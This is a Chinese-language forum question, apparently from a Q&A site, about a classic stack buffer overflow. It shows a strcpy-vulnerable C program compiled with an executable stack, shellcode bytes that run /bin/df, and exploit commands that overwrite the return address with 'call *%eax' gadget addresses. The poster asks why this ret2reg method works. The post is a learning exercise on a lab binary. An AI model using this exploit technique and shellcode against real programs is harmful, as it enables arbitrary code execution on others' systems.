鉴于此 C 程序:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char buf[1024];
strcpy(buf, argv[1]);
}
内置:
gcc -m32 -z execstack prog.c -o prog
给定外壳代码:
EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')
该程序可通过以下命令加以利用:
./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')
我从哪里得到地址:
$ objdump -d prog | grep call.*eax
8048387: ff d0 call *%eax
804840f: ff d0 call *%eax
AAAA中间的paddings的意思我明白了,我根据buf程序中的长度和$EGG.
我不明白为什么这些地址中的任何一个都会call *%eax触发复制到开头的 shellcode 的执行buf。据我了解,我正在用0x8048387(或另一个)覆盖返回地址,我不明白为什么这会导致跳转到 shellcode。
通过阅读Smashing the stack for fun and profit ,我已经走到了这一步。但是这篇文章使用了另一种猜测相对地址的方法来跳转到 shellcode。我很困惑为什么这个更简单的替代解决方案有效,无需猜测。